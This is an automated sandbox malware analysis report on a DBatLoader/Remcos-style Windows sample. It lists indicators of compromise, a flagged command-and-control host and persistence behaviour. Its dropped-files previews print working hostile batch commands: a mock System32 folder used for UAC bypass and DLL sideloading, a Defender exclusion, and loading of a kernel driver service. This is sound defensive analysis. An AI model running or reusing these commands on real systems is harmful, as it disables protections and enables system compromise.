http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://6vq0og.dm.files.1drv.com/	Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com:443/download?resid=22C765749E54F934%21123&authkey=	qDKTsL1y44.exe, 00000000.00000002.1503258792.000000000087E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/Z	qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?resid=22C765749E54F934%21123&authkey=	Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000678000.00000004.00000020.00020000.00000000.sdmp	false		high
https://6vq0og.dm.files.1drv.com:443/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk	qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://checkip.amazonaws.com/socket	veaiqniF.pif	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://6vq0og.dm.files.1drv.com/D	qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		high
https://6vq0og.dm.files.1drv.com/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WdLIe	Finqiaev.PIF, 00000009.00000002.1627524051.0000000000A57000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/	Finqiaev.PIF, 0000000B.00000003.1739950687.0000000000648000.00000004.00000020.00020000.00000000.sdmp	false		high
http://severdops.ddns.net:2024	veaiqniF.pif, 0000000A.00000002.1900086210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.micro	veaiqniF.pif, 00000007.00000003.1529994916.000000002F746000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoftq#	qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://live.com/	qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000003.1622819787.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ipinfo.io/countryresource	veaiqniF.pif, 0000000C.00000002.1945846450.0000000000D90000.00000040.00000400.00020000.00000000.sdmp	false		high
https://live.com/)	qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/;	qDKTsL1y44.exe, 00000000.00000002.1503258792.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	qDKTsL1y44.exe, 00000000.00000003.1452714888.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1445215113.000000007BBD0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1480406289.000000001B411000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1651497472.000000007E649000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://live.com/$Tu	Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://6vq0og.dm.files.1drv.com/y4mM3rpwg7BF-uNJeP3DfPwGHRVNoN-DLFLu8jlzryO26WGzJKm854HPXCUj9LrimxR	Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000003.1739950687.00000000006F4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://6vq0og.dm.files.1drv.com/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk17j5	qDKTsL1y44.exe, 00000000.00000002.1503258792.0000000000907000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pmail.com0	qDKTsL1y44.exe, 00000000.00000002.1575958449.000000001BCCB000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1529948732.00000000028FF000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1573191593.000000001B5C0000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1484946816.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000003.1483689151.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, qDKTsL1y44.exe, 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1677400225.000000007FA0F000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 00000009.00000002.1634357707.00000000041D6000.00000004.00001000.00020000.00000000.sdmp, Finqiaev.PIF, 0000000B.00000002.1747949897.0000000004146000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
13.107.137.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
54.145.184.72	checkip.us-east-1.prod.check-ip.aws.a2z.com	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1389143
Start date and time:	2024-02-08 15:20:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	qDKTsL1y44.exe renamed because original name is a hash value
Original Sample Name:	60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@16/9@4/3
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 98% Number of executed functions: 86 Number of non-executed functions: 194
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target veaiqniF.pif, PID 7604 because there are no executed function
Execution Graph export aborted for target veaiqniF.pif, PID 7952 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: qDKTsL1y44.exe

Simulations

Behavior and APIs

Time	Type	Description
15:21:03	API Interceptor	2x Sleep call for process: qDKTsL1y44.exe modified
15:21:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Finqiaev C:\Users\Public\Finqiaev.url
15:21:16	API Interceptor	24x Sleep call for process: veaiqniF.pif modified
15:21:23	API Interceptor	2x Sleep call for process: Finqiaev.PIF modified
15:21:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Finqiaev C:\Users\Public\Finqiaev.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	5qgMqpI3O3.exe	Get hash	malicious	XClient Stealer	Browse	ipinfo.io/ip
	5qgMqpI3O3.exe	Get hash	malicious	XClient Stealer	Browse	ipinfo.io/ip
	9ndYaphcNr.exe	Get hash	malicious	XClient Stealer	Browse	ipinfo.io/ip
	9ndYaphcNr.exe	Get hash	malicious	XClient Stealer	Browse	ipinfo.io/ip
	KyRojfL3Fw.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	KyRojfL3Fw.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Jtn7A24RWR.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Jtn7A24RWR.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	QecR2L8QRt.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json?token=5c76a674354e30
	QecR2L8QRt.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json?token=5c76a674354e30
13.107.137.11	rRefN____CMS-221747.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	WORLDWID.BAT.bat	Get hash	malicious	DBatLoader	Browse
	NEW ITEMS EMARKED.bat	Get hash	malicious	DBatLoader	Browse
	0VRmzMYLNu.exe	Get hash	malicious	AgentTesla	Browse
	RFQ 11700.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Purchase Order 0151.exe	Get hash	malicious	DBatLoader	Browse
	https://1drv.ms/o/s!Auqmi-d8XdVbhWsQ8BmeM6Ph-do9?e=0gWhej	Get hash	malicious	HTMLPhisher	Browse
	DocumentsDOC03029314B76858448A444B4C03EEC7E6F.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Swift_Advice.bat.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	PO4540542295GTS-EE-9507-QTN-9507-232.bat	Get hash	malicious	DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.us-east-1.prod.check-ip.aws.a2z.com	java_adwind.jar	Get hash	malicious	Unknown	Browse	35.171.138.94
	ScubisDesk.jar	Get hash	malicious	Unknown	Browse	52.44.68.165
	ScubisDesk.jar	Get hash	malicious	Unknown	Browse	52.72.193.95
	RuntimeBroker.exe	Get hash	malicious	Hancitor	Browse	52.7.149.164
	5WwS5ffYD7.exe	Get hash	malicious	Unknown	Browse	52.5.109.238
	5WwS5ffYD7.exe	Get hash	malicious	Unknown	Browse	52.7.96.150
	SecuriteInfo.com.Win64.MalwareX-gen.4768.13818.exe	Get hash	malicious	Unknown	Browse	3.88.92.177
	SecuriteInfo.com.Win64.MalwareX-gen.4768.13818.exe	Get hash	malicious	Unknown	Browse	3.88.92.177
	PNM7zldlZv.exe	Get hash	malicious	Unknown	Browse	52.71.112.225
	PNM7zldlZv.exe	Get hash	malicious	Unknown	Browse	35.168.70.54
dual-spov-0006.spov-msedge.net	nWiLCvdU0P.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	Dwx4h2MQ2s.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	rRefN____CMS-221747.bat	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	SWIFT_MESSAGE.bat	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	WORLDWID.BAT.bat	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	NEW ITEMS EMARKED.bat	Get hash	malicious	DBatLoader	Browse	13.107.137.11
	0VRmzMYLNu.exe	Get hash	malicious	AgentTesla	Browse	13.107.137.11
	Ihfxvzhuopygpt.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	Purchase Order.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	RFQ 11700.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
ipinfo.io	56hXAwKryo.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	TBcsV64JvR.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.186.192
	SNdS4iXscM.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	SNdS4iXscM.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	R3qD3GiVhQ.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.186.192
	DjjEcDvMht.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.186.192
	GO6Yx1kOTi.exe	Get hash	malicious	RedLine, RisePro Stealer	Browse	34.117.186.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	YFtU3BfEsx.exe	Get hash	malicious	Unknown	Browse	40.71.99.188
	nWiLCvdU0P.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	http://sansarbuildcon.com/.well-known/pki-validation/Msg9928.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	Dwx4h2MQ2s.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.139.11
	Melanie.bodoux_Lettre_virement.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.51
	56hXAwKryo.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	131.253.33.239
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	13.107.219.41
	Pending.9980233045Document(s) Export Control docsignMidlandcomputersDrivePnt9980233....msg	Get hash	malicious	HTMLPhisher	Browse	52.111.229.63
	SbqPKQFpkK.exe	Get hash	malicious	RedLine	Browse	20.79.30.95
	http://orkvo0g.ifuhik.com	Get hash	malicious	Unknown	Browse	20.50.64.3
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	YFtU3BfEsx.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	56hXAwKryo.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.188.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	oPUxYDe9mt.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	TBcsV64JvR.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.188.166
	SNdS4iXscM.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	SNdS4iXscM.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	R3qD3GiVhQ.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.188.166
AMAZON-AESUS	http://sansarbuildcon.com/.well-known/pki-validation/Msg9928.html	Get hash	malicious	HTMLPhisher	Browse	52.203.102.209
	https://proponent.com/	Get hash	malicious	Unknown	Browse	54.196.227.84
	https://track.trackminds.net/campaign/563210d7-bbd1-40f1-a8a1-5fe191294d15	Get hash	malicious	Unknown	Browse	34.203.143.4
	steve.ledford 020749_Thu Feb,2024.html	Get hash	malicious	Unknown	Browse	52.2.147.173
	http://orkvo0g.ifuhik.com	Get hash	malicious	Unknown	Browse	18.208.62.125
	SecuriteInfo.com.Trojan.GenericKD.70652520.4647.24651.exe	Get hash	malicious	Unknown	Browse	44.217.161.11
	1707378906ffbdc063d27195a5577a854b773a0ec1144fd945bf965d6f71c020b51f5c4060211.dat-decoded.exe	Get hash	malicious	Remcos	Browse	44.203.203.154
	Order for new Project ECG EGYPT.xls	Get hash	malicious	Unknown	Browse	54.227.187.23
	oerder specifications.xls	Get hash	malicious	Remcos	Browse	44.203.203.154
	https://www.dropbox.com/scl/fi/wihffpfulcq7k54sy0wep/Docs2024_08_02_99489_2837.pdf?rlkey=t3vgq79fnqwj7d5ljkmjzcgrx&dl=0	Get hash	malicious	Unknown	Browse	3.225.30.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	nWiLCvdU0P.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.137.11
	Dwx4h2MQ2s.exe	Get hash	malicious	DBatLoader, Remcos	Browse	13.107.137.11
	US0000379965_759810_4488935722.js	Get hash	malicious	Unknown	Browse	13.107.137.11
	US0000379965_759810_4488935722.js	Get hash	malicious	Unknown	Browse	13.107.137.11
	A040571_US14_I_2024668_243478_7830431007.js	Get hash	malicious	Unknown	Browse	13.107.137.11
	A040571_US14_I_2024668_243478_7830431007.js	Get hash	malicious	Unknown	Browse	13.107.137.11
	US0000348020_533626_6997231288.js	Get hash	malicious	Unknown	Browse	13.107.137.11
	US0000348020_533626_6997231288.js	Get hash	malicious	Unknown	Browse	13.107.137.11
	n634pS0ANZ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, SmokeLoader, Vidar	Browse	13.107.137.11
	Windows InstantView 2.exe	Get hash	malicious	PrivateLoader	Browse	13.107.137.11

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\netutils.dll	nWiLCvdU0P.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Dwx4h2MQ2s.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	WFRlr0p5IH.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Get hash	malicious	AgentTesla, DBatLoader, RedLine	Browse
	Bjrfyyjj.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	PCMNil7wkU.exe	Get hash	malicious	AgentTesla, AsyncRAT, DBatLoader, RedLine	Browse
	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse
C:\Users\Public\Libraries\easinvoker.exe	nWiLCvdU0P.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Dwx4h2MQ2s.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	SOA_P990T341_JAN_2024.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	rRefN____CMS-221747.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	SWIFT_MESSAGE.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Ihfxvzhuopygpt.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Purchase Order.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	RFQ 11700.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DocumentsDOC03029314B76858448A444B4C03EEC7E6F.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Swift_Advice.bat.exe	Get hash	malicious	Remcos, DBatLoader	Browse

Created / dropped Files

C:\Users\Public\Finqiaev.url

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Finqiaev.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.0302737254118135
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMULVbZsb8W+KZn:HRYFVmTWDyzVVEHbZn
MD5:	271883628F24D3E3254CAC48D553D003
SHA1:	B51C603D4566029D98D09E7371C31561F192D4F3
SHA-256:	8F6ED543C4F138848CA4D1829D14650F138C0AB674B66AA1D32FFC2F39F907CE
SHA-512:	14EE6C319E53076B3795FF1C8944D7685D41A95B75177DC4D65C0749056F372FA958531C4776453CF5C641909C6FB5A70C720021138C7EC45743F47200402082
Malicious:	true
Reputation:	low
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Finqiaev.PIF"..IconIndex=43..HotKey=92..

C:\Users\Public\Libraries\Finqiaev.PIF

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2088448
Entropy (8bit):	7.567222542176421
Encrypted:	false
SSDEEP:	49152:Tv5bdj3QfVJ9zq23znSFZyeyTDLudOybI:Tv5Rj30VjSnye4eOH
MD5:	42F93EF4AC4943F328A1518BDE3C333A
SHA1:	7BCA2B97FE0136A6787A1F08903E723A7B2A17C1
SHA-256:	60E73C48B9559B07BA1AEE9FE48E0185A2686E5B88407C590F60535FF36F85DB
SHA-512:	F3EBB6F511D27724B69D6495BF07C7AD39BDDF4C4EB3611B986FAF89920E84F5E4CCF709EC4D9797A2D4976F3694163AFAEAE61A24174CDE54D8F33FC44487FB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................0......H.............@........................... ..................@..............................L...`..........................@q...................................................................................text.............................. ..`.itext.............................. ..`.data....}.......~..................@....bss....p:...P.......,...................idata..L*.......,...,..............@....tls....4............X...................rdata...............X..............@..@.reloc..@q.......r...Z..............@..B.rsrc........`......................@..@.............. .....................@..@................................................................................................

C:\Users\Public\Libraries\FinqiaevO.bat

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	404
Entropy (8bit):	5.010767804598093
Encrypted:	false
SSDEEP:	6:rT4etMs2cLv0Y/T2cLZ9ULT2cLZthGKFIs2cLZXIs2cLZWKmxkv:f4etMXK0Yi5L60GeWbRKZv
MD5:	6880148D6CD8FABDCE94B7E91DBD8D17
SHA1:	870E9AD13355A8452746E0904D004EE8C8EC66E5
SHA-256:	0BFE311FFB1DE96CBB2616C2A59C2A1A4942EC03073CC2DDFDFC43F79C74D18A
SHA-512:	810EE2896597CBCF813B9285BB2D7F9127360A4D8A872C47460D32710FE114C27ED58F840DC8BCFDAF7B826E7E46C78C0E814E4FA3D380D10737673A1FEBF38E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	start /min cmd /c mkdir "\\?\C:\Windows " &..mkdir "\\?\C:\Windows \System32" &..ECHO F\|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y &.."C:\\Windows \\System32\\easinvoker.exe" &..EXIT ......

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	271
Entropy (8bit):	4.820351746235622
Encrypted:	false
SSDEEP:	6:rYGnyiMMQ75ieGgdEYlRALolXlXINbaH1BYPWND1Qozn:8GnGMQ7hu+m2XlXI+BYONe2
MD5:	D62B11DC4DC821EF23260E5B0E74A835
SHA1:	CDFF2004CB9EF149F75FAE296F50F4FBFEFB2E84
SHA-256:	D1B19B878A3AE98F650843314CC3EF8D681013F6E18E0201CB47A0AFA45FC349
SHA-512:	27B8292EB318413B965E1C7552165E65F9003D03B15DDC0C5C142420A1A174303F983C268942D7B60C74AC4E8E79E01F83510807FC0C492CABDF4948BC69C625
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & ..sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &..sc.exe start truesight &..exit....

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:An:An
MD5:	3104A32D71DBED6FBECEDFDA3232DDEC
SHA1:	F8097130148EE5262F52EC496DE769A30A9C2FB3
SHA-256:	02E04F4B3B2D87DB09E591281D198DB8823038D64C314FB6591DC26A6F872309
SHA-512:	DBC4471D8CE97AF4F55CDA6BDB87DA32733529EB78E08305B36E3527D7287F1E0E402DF45D771A980658FCA9AB20FF1A1BB5783DE6CBC8B4310416F02B5B6FDE
Malicious:	false
Preview:	68..

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
